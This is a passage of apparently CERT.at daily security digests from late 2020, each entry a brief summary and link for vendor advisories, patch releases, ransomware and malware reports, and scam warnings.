Adobe has published security bulletins for Adobe Connect (APSB20-69) and Adobe Reader Mobile (APSB20-71). Adobe recommends users update their product installations to the latest versions using the instructions referenced in the relevant bulletin. This posting is provided "AS IS" with no warranties and confers no rights.
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1942
∗∗∗ Cisco IOS XR Software for Cisco ASR 9000 Series Aggregation Services Routers Slow Path Forwarding Denial of Service Vulnerability ∗∗∗
---------------------------------------------
A vulnerability in the ingress packet processing function of Cisco IOS XR Software for Cisco ASR 9000 Series Aggregation Services Routers could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper resource allocation when an affected device processes network traffic in software switching mode (punted).
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ SSA-492828: Denial-of-Service Vulnerability in SIMATIC S7-300 CPUs and SINUMERIK Controller ∗∗∗
---------------------------------------------
A vulnerability in S7-300 might allow an attacker to cause a Denial-of-Service condition on port 102 of the affected devices by sending specially crafted packets. Siemens is preparing updates and recommends specific countermeasures until fixes are available.
---------------------------------------------
https://cert-portal.siemens.com/productcert/txt/ssa-492828.txt
∗∗∗ SSA-431802: Multiple Vulnerabilities in SCALANCE W1750D ∗∗∗
---------------------------------------------
Siemens SCALANCE W1750D is a brand-labelled device. Aruba has released a related security advisory (ARUBA-PSA-2016-004) [0] disclosing vulnerabilities in its Aruba Instant product line. The advisory contains multiple related vulnerabilities that are summarized in CVE-2016-2031.
---------------------------------------------
https://cert-portal.siemens.com/productcert/txt/ssa-431802.txt
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (moin, obfs4proxy, tcpdump, and zeromq3), Fedora (samba), Mageia (lout, openldap, pacemaker, samba, sddm, and spice, spice-gtk), openSUSE (bluez, ImageMagick, java-1_8_0-openj9, otrs, and wireshark), Red Hat (bind, buildah, curl, fence-agents, kernel, kernel-rt, kpatch-patch, librepo, libvirt, podman, python, python3, qt and qt5-qtbase, resource-agents, skopeo, tomcat, and unixODBC), SUSE (gcc10, python3, SDL, and zeromq), and Ubuntu (libexif).
---------------------------------------------
https://lwn.net/Articles/836770/
∗∗∗ IPAS: Security Advisories for November 2020 ∗∗∗
---------------------------------------------
Hello, It’s the second Tuesday in November and today we are releasing 40 security advisories. If this seems like a large number of advisories for Intel to be releasing, you’re right. However, there are two primary reasons for this. First, as I mentioned in August, we are aligning public disclosures, as much as possible, to [...]
---------------------------------------------
https://blogs.intel.com/technology/2020/11/ipas-security-advisories-for-nov…
=====================
= End-of-Day report =
=====================
Timeframe: Friday 06-11-2020 18:00 − Monday 09-11-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Hackers have repeatedly grabbed source code from SonarQube instances ∗∗∗
---------------------------------------------
The FBI already warned in October of an attack on installations belonging to, among others, US government agencies, but also private companies.
---------------------------------------------
https://heise.de/-4951630
∗∗∗ Let's Encrypt: Old Android devices run into problems with millions of sites ∗∗∗
---------------------------------------------
The certificate change at Let's Encrypt causes problems for a third of all Android devices. The solution is Firefox.
---------------------------------------------
https://www.golem.de/news/let-s-encrypt-alte-android-geraete-bekommen-probl…
∗∗∗ New Pay2Key ransomware encrypts networks within one hour ∗∗∗
---------------------------------------------
A new ransomware called Pay2Key has been targeting organizations from Israel and Brazil, encrypting their networks within an hour in targeted attacks still under investigation.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-pay2key-ransomware-encry…
∗∗∗ How Ryuk Ransomware operators made $34 million from one victim ∗∗∗
---------------------------------------------
One hacker group that is targeting high-revenue companies with Ryuk ransomware received $34 million from one victim in exchange for the decryption key that unlocked their computers.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/how-ryuk-ransomware-operator…
∗∗∗ Gitpaste-12 Worm Targets Linux Servers, IoT Devices ∗∗∗
---------------------------------------------
The newly discovered malware uses GitHub and Pastebin to house component code, and harbors 12 different initial attack vectors.
---------------------------------------------
https://threatpost.com/gitpaste-12-worm-linux-servers-iot-devices/161016/
∗∗∗ Adventures in Anti-Gravity ∗∗∗
---------------------------------------------
Here we deconstruct a Mac variant of GravityRAT (the cross-platform spyware, known to target the Indian armed forces).
---------------------------------------------
https://objective-see.com/blog/blog_0x5B.html
∗∗∗ Cryptojacking Targeting WebLogic TCP/7001, (Sat, Nov 7th) ∗∗∗
---------------------------------------------
This past week I got some interesting logs targeting TCP/7001 (WebLogic CVE-2020-14882 - see previous diary[1][2]) looking to download and launch a shell script to install various cryptominers on the target. The shell script targets SELinux-compatible hosts, likely CentOS/RedHat, Ubuntu, etc., to install various cryptominer applications.
---------------------------------------------
https://isc.sans.edu/diary/rss/26768
∗∗∗ How Attackers Brush Up Their Malicious Scripts, (Mon, Nov 9th) ∗∗∗
---------------------------------------------
On Friday, I received a bunch of alerts from one of my YARA hunting rules. Several samples were submitted from the same account (through the VT API), from the same country (US), and in a very short period of time. All the submitted files were OLE2 files containing a malicious macro. All of them had a low VT score, so they deserved some investigation. I downloaded the samples and had a look at them.
---------------------------------------------
https://isc.sans.edu/diary/rss/26770
∗∗∗ When Threat Actors Fly Under the Radar: Vatet, PyXie and Defray777 ∗∗∗
---------------------------------------------
Vatet, PyXie and Defray777 are all associated with a financially motivated threat group. We aim to get these malware families on the radar.
---------------------------------------------
https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/
∗∗∗ xHunt Campaign: Newly Discovered Backdoors Using Deleted Email Drafts and DNS Tunneling for Command and Control ∗∗∗
---------------------------------------------
We observed evidence that the xHunt campaign used two backdoors on a compromised Microsoft Exchange Server at an organization in Kuwait.
---------------------------------------------
https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/
=====================
= Vulnerabilities =
=====================
∗∗∗ Cisco patches serious vulnerability in Webex Meetings for Windows ∗∗∗
---------------------------------------------
The vulnerability came to light during internal tests. A local attacker can execute malicious code. Further vulnerabilities exist in the Web Network Recording Player and Webex Player.
---------------------------------------------
https://www.zdnet.de/88389577/cisco-stopft-schwerwiegende-luecke-in-webex-m…
∗∗∗ WordPress Sites Open to Code Injection Attacks via Welcart e-Commerce Bug ∗∗∗
---------------------------------------------
The shopping cart application contains a PHP object-injection bug.
---------------------------------------------
https://threatpost.com/wordpress_open_to_attacks_welcart_bug/161037/
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by CentOS (bind, firefox, java-1.8.0-openjdk, kernel, libX11, qemu-kvm, thunderbird, and xorg-x11-server), Debian (guacamole-server, krb5, libexif, poppler, raptor2, and sympa), Fedora (blueman, chromium, freetype, galera, krb5, libtpms, mariadb, mariadb-connector-c, pngcheck, and salt), Mageia (blueman, docker, fontforge, junit, libproxy, libuv, mariadb, suricata, and webmin), openSUSE (apache-commons-httpclient, bluez, gnome-settings-daemon, gnome-shell, [...]
---------------------------------------------
https://lwn.net/Articles/836676/
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 05-11-2020 18:00 − Friday 06-11-2020 18:00
Handler: Dimitri Robl
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Reverse shell botnet Gitpaste-12 spreads via GitHub and Pastebin ∗∗∗
---------------------------------------------
A newly discovered worm and botnet named Gitpaste-12 lives on GitHub and also uses Pastebin to host malicious code. The advanced malware comes equipped with reverse shell and crypto mining capabilities.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/reverse-shell-botnet-gitpast…
∗∗∗ Security flaw: admin password for emergency-services system exposed online ∗∗∗
---------------------------------------------
The Ivena software is used to register emergency patients at hospitals. An admin password was publicly visible on the manufacturer's website.
---------------------------------------------
https://www.golem.de/news/sicherheitsluecke-admin-passwort-fuer-rettungsdie…
∗∗∗ RansomEXX Trojan attacks Linux systems ∗∗∗
---------------------------------------------
We recently discovered a new file-encrypting Trojan built as an ELF executable and intended to encrypt data on machines controlled by Linux-based operating systems.
---------------------------------------------
https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/
∗∗∗ ALFA TEaM Shell ~ v4.1-Tesla: A Feature Update Analysis ∗∗∗
---------------------------------------------
We’ve seen a wider variety of PHP web shells being used by attackers this year — including a number of shells that have been significantly updated in an attempt to “improve” them. Depending on the scope of changes and feature enhancements that are added to an existing web shell’s source code, these updates can be tedious and time consuming for bad actors. For this reason, it’s common to see code for web shells reused among different, unaffiliated attackers.
---------------------------------------------
https://blog.sucuri.net/2020/11/alfa-team-shell-v4-1-tesla-a-feature-update…
∗∗∗ Rediscovering Limitations of Stateful Firewalls: "NAT Slipstreaming" ? Implications, Detections and Mitigations ∗∗∗
---------------------------------------------
A recent {rediscovered} technique (NAT Slipstreaming) to allow an attacker to remotely access any TCP/UDP service bound to a victim's machine, thus bypassing the victim's Network Address Translation (NAT)/firewall implementation, was detailed by Samy Kamkar [1]. Samy had also shared a similar technique termed "NAT Pinning" back in 2010 [2]. The similarities in both techniques were convincing victims to access a specially crafted site implementing said techniques, resulting in [...]
---------------------------------------------
https://isc.sans.edu/forums/diary/Rediscovering+Limitations+of+Stateful+Fir…
∗∗∗ Business VOIP phone systems are being hacked for profit worldwide. Is yours secure? ∗∗∗
---------------------------------------------
Security researchers have uncovered an organised gang of cybercriminals who are compromising the VOIP phone systems of over 1000 organisations worldwide. Check Point has identified a malicious campaign that has targeted a critical vulnerability in the Sangoma PBX open-source GUI, used to manage installations of Asterisk - the world's most popular VOIP phone system for businesses.
---------------------------------------------
https://businessinsights.bitdefender.com/business-voip-phone-systems-are-be…
∗∗∗ IntelMQ offers tutorial lessons and a new documentation page ∗∗∗
---------------------------------------------
The IntelMQ tutorial guiding through various features and tools of IntelMQ is available in the IntelMQ Tutorial GitHub repository. Lesson one introduces the architecture, concepts and terminology of the project. Lessons two and three delve hands-on into working with IntelMQ. Starting with installation and basic usage & configuration they go on to tackle progressively more advanced topics like using advanced features or changing the message queue software to be used.
---------------------------------------------
https://cert.at/en/blog/2020/11/intelmq-tutorial-and-new-documentation-page
∗∗∗ Ryuk Speed Run, 2 Hours to Ransom ∗∗∗
---------------------------------------------
Since the end of September Ryuk has been screaming back into the news. We’ve already covered 2 cases in that timeframe. We’ve seen major healthcare providers, managed service providers, [...]
---------------------------------------------
https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/
=====================
= Vulnerabilities =
=====================
∗∗∗ iOS vulnerabilities actively exploited - no update for iOS 13 ∗∗∗
---------------------------------------------
Apple users should update their operating system promptly; critical vulnerabilities are apparently being used in attacks. Not all system versions receive updates.
---------------------------------------------
https://heise.de/-4950496
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (sddm and wordpress), Fedora (blueman, chromium, pngcheck, and salt), openSUSE (chromium, salt, tiff, tigervnc, tmux, tomcat, transfig, and xen), Oracle (freetype, kernel, libX11, thunderbird, and xorg-x11-server), SUSE (bluez, ImageMagick, java-1_8_0-openjdk, rmt-server, salt, and u-boot), and Ubuntu (dom4j, firefox, netqmail, phpldapadmin, and tmux).
---------------------------------------------
https://lwn.net/Articles/836467/
∗∗∗ Security Advisory - Netlogon Elevation of Privilege Vulnerability ∗∗∗
---------------------------------------------
https://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201105…
∗∗∗ Digium Certified Asterisk: Multiple vulnerabilities allow denial of service ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1084
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 04-11-2020 18:00 − Thursday 05-11-2020 18:00
Handler: Dimitri Robl
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Exploit for Cisco AnyConnect VPN in circulation - security update still pending ∗∗∗
---------------------------------------------
Attacks on Cisco's VPN solution AnyConnect could be imminent. So far, however, there are only patches for other vulnerabilities in IOS XR, Webex and others.
---------------------------------------------
https://heise.de/-4948798
∗∗∗ Attacks on industrial enterprises using RMS and TeamViewer: new data ∗∗∗
---------------------------------------------
In summer 2019, Kaspersky ICS CERT identified a new wave of phishing emails containing various malicious attachments. The emails target companies and organizations from different sectors of the economy that are associated with industrial production in one way or another.
---------------------------------------------
https://securelist.com/attacks-on-industrial-enterprises-using-rms-and-team…
∗∗∗ Did You Spot "Invoke-Expression"?, (Thu, Nov 5th) ∗∗∗
---------------------------------------------
When a PowerShell script is obfuscated, the deobfuscation process is, most of the time, performed through the Invoke-Expression cmdlet[1]. Invoke-Expression evaluates the string passed as an argument and returns the results of the commands inside the string.
---------------------------------------------
https://isc.sans.edu/diary/rss/26762
∗∗∗ Legacy Mauthtoken Malware Continues to Redirect Mobile Users ∗∗∗
---------------------------------------------
During malware analysis, we regularly find variations of this injected script on various compromised websites: [...] The variable "_0x446d" assigns hex encoded strings in different positions in the array. If we get the ASCII representation of the variable, we'll end up with the following code: [...]
---------------------------------------------
https://blog.sucuri.net/2020/11/legacy-mauthtoken-malware-continues-to-redi…
∗∗∗ BEC Scammers Exploit Flaw to Spoof Domains of Rackspace Customers ∗∗∗
---------------------------------------------
A threat actor specializing in business email compromise (BEC) attacks has been observed exploiting a vulnerability to spoof the domains of Rackspace customers as part of its operations.
---------------------------------------------
https://www.securityweek.com/bec-scammers-exploit-flaw-spoof-domains-racksp…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates: BIG-IP appliances and the admin trap ∗∗∗
---------------------------------------------
Network equipment vendor F5 has released important patches to secure various appliances.
---------------------------------------------
https://heise.de/-4949448
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (bouncycastle, gdm3, and libonig), Fedora (arpwatch, thunderbird, and trousers), openSUSE (chromium, gn), Red Hat (freetype, libX11, thunderbird, and xorg-x11-server), and SUSE (ImageMagick, java-11-openjdk, salt, and wireshark).
---------------------------------------------
https://lwn.net/Articles/836238/
∗∗∗ In Wild Critical Buffer Overflow Vulnerability in Solaris Can Allow Remote Takeover - CVE-2020-14871 ∗∗∗
---------------------------------------------
FireEye Mandiant has been investigating compromised Oracle Solaris machines in customer environments. During our investigations, we discovered an exploit tool on a customer’s system and analyzed it to see how it was attacking their Solaris environment. The FLARE team’s Offensive Task Force analyzed the exploit to determine how it worked, reproduced the vulnerability on different versions of Solaris, and then reported it to Oracle. In this blog post we present a description of the [...]
---------------------------------------------
https://www.fireeye.com/blog/threat-research/2020/11/critical-buffer-overfl…
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 03-11-2020 18:00 − Wednesday 04-11-2020 18:00
Handler: Dimitri Robl
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Won 49,500 euros? Beware, scammers pose as EuroMillionen on the phone! ∗∗∗
---------------------------------------------
"Congratulations. You have won 49,500 euros." Scammers call in the name of EuroMillionen and deliver this good news to their victims. In reality, however, it is advance-fee fraud: before the amount can be transferred, the supposed winners must pay 1,500 euros for insurance. The prize is never transferred, so the 1,500 euros are lost.
---------------------------------------------
https://www.watchlist-internet.at/news/49500-euro-gewonnen-vorsicht-betrueg…
∗∗∗ Exchange vulnerability: many servers still exposed ∗∗∗
---------------------------------------------
One month after heise Security reported on the dramatic number of vulnerable systems, the situation has improved but is still far from relaxed.
---------------------------------------------
https://heise.de/-4947221
∗∗∗ Google: Android vulnerability can "permanently" disable devices ∗∗∗
---------------------------------------------
With the November update for Android, Google closes several critical security vulnerabilities. Devices can be disabled or even taken over.
---------------------------------------------
https://www.golem.de/news/google-android-luecke-kann-geraete-dauerhaft-lahm…
∗∗∗ New RegretLocker ransomware targets Windows virtual machines ∗∗∗
---------------------------------------------
A new ransomware called RegretLocker uses a variety of advanced features that allows it to encrypt virtual hard drives and close open files for encryption.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-regretlocker-ransomware-…
∗∗∗ Sneaky Office 365 phishing inverts images to evade detection ∗∗∗
---------------------------------------------
A creative Office 365 phishing campaign has been inverting images used as backgrounds for landing pages to avoid getting flagged as malicious by crawlers designed to spot phishing sites.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/sneaky-office-365-phishing-i…
∗∗∗ Attackers Exploiting WebLogic Servers via CVE-2020-14882 to install Cobalt Strike, (Tue, Nov 3rd) ∗∗∗
---------------------------------------------
Starting late last week, we observed a large number of scans against our WebLogic honeypots to detect if they are vulnerable to CVE-2020-14882. CVE-2020-14882 was patched about two weeks ago as part of Oracle's quarterly critical patch update. In addition to scans simply enumerating vulnerable servers, we saw a small number of scans starting on Friday (Oct. 30th) attempting to install crypto-mining tools [1].
---------------------------------------------
https://isc.sans.edu/diary/rss/26752
=====================
= Vulnerabilities =
=====================
∗∗∗ SaltStack: Security packages fix three vulnerabilities, some of them critical ∗∗∗
---------------------------------------------
Updates are available for many SaltStack versions; given the risk posed by three vulnerabilities, the developers advise updating promptly.
---------------------------------------------
https://heise.de/-4947393
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Arch Linux (chromium and firefox), Fedora (nss), openSUSE (pacemaker), Red Hat (bind, binutils, bluez, cloud-init, container-tools:rhel8, cryptsetup, cups, curl, cyrus-imapd, cyrus-sasl, dovecot, dpdk, edk2, evolution, expat, file-roller, fontforge, freeradius:3.0, freerdp and vinagre, freetype, frr, gd, glibc, GNOME, gnome-software and fwupd, gnupg2, grafana, httpd:2.4, idm:DL1 and idm:client, kernel, kernel-rt, libarchive, libexif, libgcrypt, libldb, [...]
---------------------------------------------
https://lwn.net/Articles/836137/
∗∗∗ Cisco Security Advisories ∗∗∗
---------------------------------------------
Cisco has published a total of 35 security advisories for several products with the following Security Impact Ratings:
High: 12
Medium: 23
---------------------------------------------
https://tools.cisco.com/security/center/Search.x?publicationTypeIDs=1&first…
∗∗∗ Patch for Critical VMware ESXi Vulnerability Incomplete ∗∗∗
---------------------------------------------
VMware on Wednesday informed customers that it has released new patches for ESXi after learning that a fix made available last month for a critical vulnerability was incomplete.
---------------------------------------------
https://www.securityweek.com/patch-critical-vmware-esxi-vulnerability-incom…
∗∗∗ Joomla Publisher V 3.0.19 Stored XSS ∗∗∗
---------------------------------------------
https://cxsecurity.com/issue/WLB-2020110017
∗∗∗ Joomla JomSocial 4.7.6 Stored XSS ∗∗∗
---------------------------------------------
https://cxsecurity.com/issue/WLB-2020110016
∗∗∗ Security Advisory - Insecure Encryption Algorithm Vulnerability in Some Huawei Products ∗∗∗
---------------------------------------------
https://www.huawei.com/en/psirt/security-advisories/2019/huawei-sa-20201104…
∗∗∗ Vulnerabilities in Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) ∗∗∗
---------------------------------------------
https://sec-consult.com/./en/blog/advisories/vulnerabilities-in-trend-micro…
∗∗∗ Red Hat Enterprise Linux: Multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1076
=====================
= End-of-Day report =
=====================
Timeframe: Monday 02-11-2020 18:00 − Tuesday 03-11-2020 18:00
Handler: Dimitri Robl
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Emotet -> Qakbot -> more Emotet, (Tue, Nov 3rd) ∗∗∗
---------------------------------------------
On Friday 2020-10-30, I generated an Emotet infection in my lab and saw Qakbot as the follow-up malware. I let the activity run for a while, then another Emotet infection appeared on the same host after Qakbot started.
---------------------------------------------
https://isc.sans.edu/diary/rss/26750
∗∗∗ Live off the Land? How About Bringing Your Own Island? An Overview of UNC1945 ∗∗∗
---------------------------------------------
Through Mandiant investigation of intrusions between February 2018 and September 2020, the FLARE Advanced Practices team observed a group we track as UNC1945 compromise telecommunications companies and operate against a tailored set of targets within the financial and professional consulting industries by leveraging access to third-party networks (see this blog post for an in-depth description of “UNC” groups). UNC1945 targeted Oracle Solaris operating systems, utilized several [...]
---------------------------------------------
https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-o…
∗∗∗ JavaScript package manager: Twilio brandjacking package opens backdoor ∗∗∗
---------------------------------------------
Last weekend, attackers published a package named twilio-npm that starts a reverse shell on the developer's system.
---------------------------------------------
https://heise.de/-4945861
∗∗∗ Pigeonholes for vulnerabilities: An overview of the CVE system ∗∗∗
---------------------------------------------
MITRE's Common Vulnerabilities and Exposures (CVE) system is the established standard for managing vulnerabilities. We explain what it is all about.
---------------------------------------------
https://heise.de/-4940478
∗∗∗ Buying puppies on the internet? - Better not! ∗∗∗
---------------------------------------------
When researching breeders online, you may come across websites selling beautiful pedigree puppies, usually at a very low price. Animal lovers are enticed, above all by affectionate photos and descriptions, to contact the supposed breeder. But beware: trading dogs and cats over the internet is prohibited in Austria.
---------------------------------------------
https://www.watchlist-internet.at/news/hundewelpen-im-internet-kaufen-liebe…
∗∗∗ These software bugs are years old. But businesses still aren't patching them ∗∗∗
---------------------------------------------
Many organisations still haven't applied security patches issued years ago, putting them at risk from common cyber attacks.
---------------------------------------------
https://www.zdnet.com/article/these-software-bugs-are-years-old-but-busines…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security Alert CVE-2020-14750 Released ∗∗∗
---------------------------------------------
Oracle has just released Security Alert CVE-2020-14750. This vulnerability affects a number of versions of Oracle WebLogic Server and has a CVSS Base Score of 9.8. WebLogic Server customers should refer to the Security Alert Advisory for information on affected versions and how to obtain the required patches. This vulnerability is related to CVE-2020-14882, which was addressed in the October 2020 Critical Patch Update. Vulnerability CVE-2020-14750 is remotely exploitable without authentication, [...]
---------------------------------------------
https://blogs.oracle.com/security/security-alert-cve-2020-14750-released
∗∗∗ Security Updates Available for Adobe Acrobat and Reader (APSB20-67) ∗∗∗
---------------------------------------------
Adobe has published a security bulletin for Adobe Acrobat and Reader (APSB20-67). The updates referenced in the bulletin address critical, important and moderate vulnerabilities and Adobe recommends users update their product installations to the latest versions using the instructions referenced in the bulletin.
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1939
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (blueman and wordpress), Fedora (fastd, kernel, and samba), Gentoo (bluez, fossil, kpmcore, libssh, and opendmarc), openSUSE (claws-mail and icinga2), and Ubuntu (blueman).
---------------------------------------------
https://lwn.net/Articles/835952/
∗∗∗ Google's Project Zero uncovers security vulnerability at GitHub ∗∗∗
---------------------------------------------
The security team has rated the risk of the discovered vulnerability to developers as high. There is no quick fix for the problem so far.
---------------------------------------------
https://heise.de/-4946535
∗∗∗ Android Security Bulletin - November 2020 ∗∗∗
---------------------------------------------
[...] The most severe of these issues is a critical security vulnerability in the System component that could enable a proximal attacker using a specially crafted transmission to execute arbitrary code within the context of a privileged process.
---------------------------------------------
https://source.android.com/security/bulletin/2020-11-01
∗∗∗ Google Patches Actively Exploited Chrome Vulnerabilities ∗∗∗
---------------------------------------------
Google has released updates to address multiple vulnerabilities in the Chrome browser, including two that are actively exploited in attacks. Chrome 86.0.4240.183 for Windows, macOS, and Linux was pushed to the stable channel with patches for a total of seven vulnerabilities, all of which feature a severity rating of high.
---------------------------------------------
https://www.securityweek.com/google-patches-actively-exploited-chrome-vulne…
=====================
= End-of-Day report =
=====================
Timeframe: Friday 30-10-2020 18:00 − Monday 02-11-2020 18:00
Handler: Dimitri Robl
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Security flaw: Zero-day in the Windows kernel published ∗∗∗
---------------------------------------------
Google published the vulnerability after only 7 days because it was already being actively exploited. There are no patches.
---------------------------------------------
https://www.golem.de/news/sicherheitsluecke-zero-day-im-windows-kernel-vero…
∗∗∗ More File Selection Gaffes, (Sat, Oct 31st) ∗∗∗
---------------------------------------------
A reader submitted a file, that turned out to be a mass mailer project file used by malicious actors.
---------------------------------------------
https://isc.sans.edu/diary/rss/26722
∗∗∗ CSS-JS Steganography in Fake Flash Player Update Malware ∗∗∗
---------------------------------------------
This summer, MalwareBytes researcher Jérôme Segura wrote an article about how criminals use image files (.ico) to hide JavaScript credit card stealers on compromised e-commerce sites. In a tweet, Affable Kraut also reported another similar obfuscation technique using .ico files to conceal JavaScript skimmers. Just something I’ve noticed more recently with digital skimmers/#magecart.
---------------------------------------------
https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-u…
∗∗∗ How to Protect Yourself From Pwned and Password Reuse Attacks ∗∗∗
---------------------------------------------
Many businesses are currently looking at how to bolster security across their organization as the pandemic and remote work situation continues to progress towards the end of the year. As organizations continue to implement security measures to protect business-critical data, there is an extremely important area of security that often gets overlooked - passwords.
---------------------------------------------
https://thehackernews.com/2020/11/how-to-protect-yourself-from-pwned-and.ht…
∗∗∗ NAT Slipstreaming ∗∗∗
---------------------------------------------
NAT Slipstreaming allows an attacker to remotely access any TCP/UDP service bound to a victim machine, bypassing the victim's NAT/firewall (arbitrary firewall pinhole control), just by the victim visiting a website.
---------------------------------------------
https://samy.pl/slipstream/
∗∗∗ Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment ∗∗∗
---------------------------------------------
UPDATE (Oct. 30, 2020): We have updated the report to include additional protection and containment strategies based on front-line visibility and response efforts in combating ransomware. While the full scope of recommendations included within the initial report remain unchanged, the following strategies have been added into the report: [...]
---------------------------------------------
https://www.fireeye.com/blog/threat-research/2019/09/ransomware-protection-…
∗∗∗ Cisco Talos Advisory on Adversaries Targeting the Healthcare and Public Health Sector ∗∗∗
---------------------------------------------
Cisco Talos has become aware that an adversary is leveraging Trickbot banking trojan and Ryuk ransomware to target U.S. hospitals and healthcare providers at an increasing rate. Security journalists reported on October 28, 2020 that the adversary was preparing to encrypt systems at “potentially hundreds” of medical centers and hospitals, based on a tip from a researcher who had been monitoring communications for the threat actor.
---------------------------------------------
https://blog.talosintelligence.com/2020/10/healthcare-advisory.html
∗∗∗ RiskIQ Has Released Its Corpus of Infrastructure and IOCs Related to Ryuk Ransomware ∗∗∗
---------------------------------------------
Ryuk Ransomware has flooded US hospitals, threatening to shut down their operations when they're needed most. Ryuk now accounts for a third of all ransomware attacks in 2020, with its operators finding success while many healthcare organizations are most vulnerable. However, the cybersecurity community is coming together to combat this rash of attacks, combining resources to provide network defenders with alerts and intelligence to protect our healthcare institutions.
---------------------------------------------
https://www.riskiq.com/blog/external-threat-management/ryuk-ransoware-indic…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (cimg, junit4, kernel, openldap, qtsvg-opensource-src, spice, spice-gtk, tzdata, and wireshark), Fedora (firefox, java-1.8.0-openjdk, java-11-openjdk, and thunderbird), openSUSE (apache2, binutils, libvirt, lout, pacemaker, pagure, phpMyAdmin, samba, sane-backends, singularity, spice, spice-gtk, thunderbird, nspr, tomcat, virt-bootstrap, and xen), SUSE (graphviz, liblouis, and samba), and Ubuntu (samba).
---------------------------------------------
https://lwn.net/Articles/835838/
∗∗∗ Oracle Security Alert for CVE-2020-14750 - 01 November 2020 ∗∗∗
---------------------------------------------
https://www.oracle.com/security-alerts/alert-cve-2020-14750.html
∗∗∗ Hormann BiSecur Gateway and Home Server multiple vulnerabilities ∗∗∗
---------------------------------------------
https://sec-consult.com/./en/blog/advisories/hormann-bisecur-gateway-and-ho…
∗∗∗ WordPress: Multiple vulnerabilities ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-1058
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 29-10-2020 18:00 − Friday 30-10-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ "2nd lockdown! Crisis! What now?" - SMS advertises fraudulent investment platform ∗∗∗
---------------------------------------------
A tightening of the coronavirus measures means less income for many people. Scammers know this too, and they deliberately exploit this predicament. A fraudulent SMS is currently circulating that offers a seemingly simple solution: investing in Bitcoin, but on a dubious platform. The resulting losses range from 200 euros to well over 100,000 euros. So delete the SMS!
---------------------------------------------
https://www.watchlist-internet.at/news/2-lockdown-krise-was-jetzt-sms-bewir…
∗∗∗ [SANS ISC] Quick Status of the CAA DNS Record Adoption ∗∗∗
---------------------------------------------
I published the following diary on isc.sans.edu: "Quick Status of the CAA DNS Record Adoption": In 2017, we already published a guest diary about "CAA" or "Certification Authority Authorization". I was curious about the status of this technique and the adoption level in 2020. Has it been adopted massively since [...]
---------------------------------------------
https://blog.rootshell.be/2020/10/30/sans-isc-quick-status-of-the-caa-dns-r…
∗∗∗ BEC Attacks Targeting Energy and Infrastructure Rise by 93% ∗∗∗
---------------------------------------------
Business email compromise attacks (BEC) have continued to grow in Q3 of 2020, rising by 15% overall compared to Q2, according to Abnormal Security’s Quarterly BEC Report. The average weekly volume of BEC attacks increased quarter-by-quarter in six out of eight industries, with the biggest rise observed in the energy/infrastructure sector, at 93%.
---------------------------------------------
https://www.infosecurity-magazine.com/news/bec-attacks-energy-infrastructur…
∗∗∗ Pktvisor: Open source tool for network visibility ∗∗∗
---------------------------------------------
NS1 announced that pktvisor, a lightweight, open source tool for real-time network visibility, is available on GitHub. The importance of applications and digital services has skyrocketed in 2020. Connectivity and resilience are imperative to keeping people connected and business moving forward. Visibility into network traffic, especially in distributed edge environments and with malicious attacks on the rise, is a critical part of ensuring uptime and performance.
---------------------------------------------
https://www.helpnetsecurity.com/2020/10/30/pktvisor-open-source-tool/
∗∗∗ Oh ... Ransomware has encrypted my backups too ... What now? ∗∗∗
---------------------------------------------
Ransomware has been haunting companies worldwide for one to two decades now [1]. There is no sign of a trend that this will change soon; unfortunately, the opposite must be assumed. The number of incidents has risen especially in recent years [2]. Attackers now rely not only on encryption but also threaten to publish company data that was exfiltrated before being rendered unusable, in order to [...]
---------------------------------------------
https://cert.at/de/blog/2020/10/oh-ransomware-hat-auch-meine-backups-versch…
=====================
= Vulnerabilities =
=====================
∗∗∗ Attacks exploiting Netlogon vulnerability (CVE-2020-1472) ∗∗∗
---------------------------------------------
